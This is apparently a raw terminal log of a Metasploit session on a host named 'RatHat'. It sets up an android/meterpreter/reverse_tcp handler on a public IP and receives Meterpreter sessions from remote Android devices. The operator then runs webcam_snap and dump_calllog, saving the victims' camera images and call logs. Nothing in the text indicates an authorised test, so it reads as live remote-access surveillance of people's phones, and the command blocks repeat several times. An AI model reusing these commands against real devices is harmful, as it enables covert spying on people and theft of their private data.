root@RatHat:~/django# msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 185.120.221.217
set lport 4445
run

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.17.17-dev                         ]
+ -- --=[ 1817 exploits - 1031 auxiliary - 315 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 185.120.221.217
lhost => 185.120.221.217
msf exploit(multi/handler) > set lport 4445
lport => 4445
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 185.120.221.217:4445
msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 185.120.221.217
set lport 4445
run
msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 185.120.221.217
set lport 4445
run
[*] Sending stage (70525 bytes) to 5.117.146.6
[*] Meterpreter session 1 opened (185.120.221.217:4445 -> 5.117.146.6:41002) at
2019-02-10 21:37:10 +0000

[*] Sending stage (70525 bytes) to 5.117.146.6
[*] Sending stage (70525 bytes) to 5.117.146.6
[*] Sending stage (70525 bytes) to 2.182.124.240
[*] 5.117.146.6 - Meterpreter session 1 closed.  Reason: Died
^C[-] Exploit failed: Interrupt
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) >
msf exploit(multi/handler) >
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 185.120.221.217:4445
[*] Sending stage (70525 bytes) to 5.117.146.6
[*] Meterpreter session 2 opened (185.120.221.217:4445 -> 5.117.146.6:41009) at
2019-02-10 21:40:41 +0000
webcam_snap -o /root/django/users/admin/
webcam_snap -o /root/django/users/admin/
dump_calllog -o /root/django/users/admin/dumpcalllog.txt
[*] 5.117.146.6 - Meterpreter session 2 closed.  Reason: Died
^C[-] Exploit failed: Interrupt
[*] Exploit completed, but no session was created.
msf exploit(multi/handler) > Interrupt: use the 'exit' command to quit
msf exploit(multi/handler) > exit -y
root@RatHat:~/django# msfconsole
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 185.120.221.217
set lport 4445
run

